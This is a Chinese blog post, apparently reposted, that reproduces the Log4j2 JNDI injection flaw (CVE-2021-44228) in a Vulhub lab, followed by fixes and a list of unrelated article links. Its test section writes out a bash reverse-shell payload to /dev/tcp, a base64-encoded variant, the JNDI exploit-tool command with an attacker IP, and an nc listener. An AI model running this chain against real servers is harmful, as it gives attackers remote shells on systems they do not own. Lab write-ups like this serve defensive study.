log4j2漏洞复现 (CVE-2021-44228)
一.漏洞原理:
Apache Log4j2 中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。通俗简单的说就是:在打印日志的时候,如果你的日志内容中包含关键词 ${,攻击者就能将关键字所包含的内容当作变量来替换成任何攻击命令,并且执行Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。
二.靶场环境:
靶机:CentOS 7 搭建Vulhub环境
攻击机:Kali
启动环境后出现下方图片,证明搭建成功了
三. 漏洞测试
用kali访问该地址
漏洞点位在action参数,我这里利用dnslog来验证
构造一个LDAP或者RMI服务器
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
构造payload:bash -i >& /dev/tcp/ip(地址)/9999 0>&1
转换一下编码
bash -c {echo,YmFzaCAtaSA JiAvZGV2L3RjcC8xOTqWeRvTs42OS85OTk5IDA JjE=}|{base64,-d}|{bash,-i}
开启工具
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA JiAvZGV2L3RjcC8xOTqWeRvTs42OS85OTk5IDA JjE=}|{base64,-d}|{bash,-i}" -A "192.168.0.0"
-C payload -A 攻击机的IP
这里有多个java版本的exp,如果不成功可以换个版本
监听端口
nc -lvnp 9999
在url地址中输入payload
反弹shell成功
修复:
-
1. 升级最新版本
-
2. 设置jvm参数"-Dlog4j2.formatMsgNoLookups=true";
-
3. 设置系统环境变量"FORMAT_MESSAGES_PATTERN_DIS-ABLE_LOOKU_PS"为"true"
-
4. 关闭应用的网络外连。
这篇好文章是转载于:学新通技术网
- 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
- 本站站名: 学新通技术网
- 本文地址: /boutique/detail/tanhfkfaab
-
photoshop保存的图片太大微信发不了怎么办
PHP中文网 06-15 -
《学习通》视频自动暂停处理方法
HelloWorld317 07-05 -
word里面弄一个表格后上面的标题会跑到下面怎么办
PHP中文网 06-20 -
Android 11 保存文件到外部存储,并分享文件
Luke 10-12 -
photoshop扩展功能面板显示灰色怎么办
PHP中文网 06-14 -
微信公众号没有声音提示怎么办
PHP中文网 03-31 -
excel下划线不显示怎么办
PHP中文网 06-23 -
excel打印预览压线压字怎么办
PHP中文网 06-22 -
TikTok加速器哪个好免费的TK加速器推荐
TK小达人 10-01 -
怎样阻止微信小程序自动打开
PHP中文网 06-13